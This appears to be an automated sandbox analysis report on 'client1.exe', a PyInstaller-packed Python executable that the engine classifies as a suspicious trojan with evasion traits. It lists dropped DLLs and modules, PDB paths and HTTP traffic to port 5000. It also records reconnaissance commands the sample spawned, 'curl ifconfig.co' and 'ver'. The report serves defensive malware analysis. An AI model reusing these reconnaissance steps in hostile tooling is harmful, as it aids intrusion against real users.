Source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs client1.exe
Source: client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1449176412.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1448460925.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs client1.exe
Source: client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs client1.exe
Source: client1.exe, 00000000.00000003.1448605663.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs client1.exe
Source: client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs client1.exe
Source: client1.exeBinary or memory string: OriginalFilename vs client1.exe
Source: client1.exe, 00000002.00000002.2696109172.00007FFBAB685000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2695346488.00007FFBAB1C6000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs client1.exe
Source: client1.exe, 00000002.00000002.2696789815.00007FFBBB5D6000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2697165497.00007FFBBB64B000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2696701429.00007FFBBB556000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2694790044.00007FFBAAE08000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs client1.exe
Source: client1.exe, 00000002.00000002.2695939389.00007FFBAB65B000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenamelibsslH vs client1.exe
Source: client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs client1.exe
Source: client1.exe, 00000002.00000002.2696918364.00007FFBBB605000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2697025018.00007FFBBB622000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2691113570.000001692E700000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs client1.exe
Source: client1.exe, 00000002.00000002.2697299452.00007FFBBCD57000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs client1.exe
Source: client1.exe, 00000002.00000002.2695611712.00007FFBAB4CE000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs client1.exe
Source: client1.exe, 00000002.00000002.2696197834.00007FFBB18A2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs client1.exe
Source: classification engineClassification label: mal56.troj.evad.winEXE@11/33@1/3
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6274B0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF79F6274B0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522Jump to behavior
Source: client1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\client1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\client1.exeFile read: C:\Users\user\Desktop\client1.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.co"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.co
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"Jump to behavior
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.co"Jump to behavior
Source: C:\Users\user\Desktop\client1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.coJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libcrypto-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: libssl-1_1.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\client1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: client1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: client1.exeStatic file information: File size 11677281 > 1048576
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: client1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: client1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: client1.exe, 00000000.00000003.1455973509.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696755408.00007FFBBB5D3000.00000002.00000001.01000000.0000000C.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: client1.exe, 00000000.00000003.1456400371.00000262AABD6000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: client1.exe, 00000002.00000002.2697114928.00007FFBBB640000.00000002.00000001.01000000.00000007.sdmp, _ctypes.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: client1.exe, 00000000.00000003.1448754711.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2695572139.00007FFBAB4C7000.00000002.00000001.01000000.00000011.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: _bcrypt.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: client1.exe, 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp, _decimal.pyd.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: client1.exe, 00000002.00000002.2695863482.00007FFBAB626000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: client1.exe, 00000000.00000003.1449006308.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696663196.00007FFBBB553000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: client1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696852289.00007FFBBB5FC000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: client1.exe, 00000000.00000003.1448200962.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696978385.00007FFBBB61D000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: client1.exe, 00000000.00000003.1447108890.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2697246600.00007FFBBCD51000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: client1.exe, 00000000.00000003.1449073775.00000262AABD2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2696163480.00007FFBB1898000.00000002.00000001.01000000.0000000B.sdmp, _socket.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: client1.exe, 00000000.00000003.1453554030.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691113570.000001692E700000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: client1.exe, 00000002.00000002.2695138214.00007FFBAB0CF000.00000002.00000001.01000000.0000000F.sdmp, libcrypto-1_1.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: client1.exe, 00000002.00000002.2693682237.00007FFBAABCC000.00000002.00000001.01000000.00000004.sdmp, python311.dll.0.dr
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: client1.exe, 00000002.00000002.2695138214.00007FFBAB151000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: client1.exe, 00000002.00000002.2696036271.00007FFBAB66D000.00000002.00000001.01000000.0000000D.sdmp, _ssl.pyd.0.dr
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: client1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VCRUNTIME140.dll.0.drStatic PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
Source: client1.exeStatic PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: python311.dll.0.drStatic PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6710E4 push rcx; retn 0000h0_2_00007FF79F6710ED
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6710CC push rbp; retn 0000h0_2_00007FF79F6710CD
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6710E4 push rcx; retn 0000h2_2_00007FF79F6710ED
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6710CC push rbp; retn 0000h2_2_00007FF79F6710CD
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C21B0 push rbp; retf 2_2_00007FFBAB1C21B3
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C21E8 push rbp; retf 2_2_00007FFBAB1C21F3
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C21E0 push rbp; retf 2_2_00007FFBAB1C21E3
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2118 push rsi; retf 2_2_00007FFBAB1C211B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2158 push rsi; retf 2_2_00007FFBAB1C215B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2130 push rbp; retf 2_2_00007FFBAB1C2133
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2180 push rsi; retf 2_2_00007FFBAB1C2183
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2168 push rsp; retf 2_2_00007FFBAB1C216B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2088 push rsi; retf 2_2_00007FFBAB1C209B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2080 push rsi; retf 2_2_00007FFBAB1C208B
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2070 push rbp; retf 2_2_00007FFBAB1C2073
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\bcrypt\_bcrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI40522\select.pydJump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 5000
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F623DF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF79F623DF0
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE8572C rdtsc 2_2_00007FFBAAE8572C
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\bcrypt\_bcrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\select.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\client1.exeAPI coverage: 1.3 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F627820 FindFirstFileExW,FindClose,0_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 0_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F636714 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF79F636714
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F627820 FindFirstFileExW,FindClose,2_2_00007FF79F627820
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FF79F6409B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF79F6409B4
Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAB1C2158 FindFirstFileW,2_2_00007FFBAB1C2158
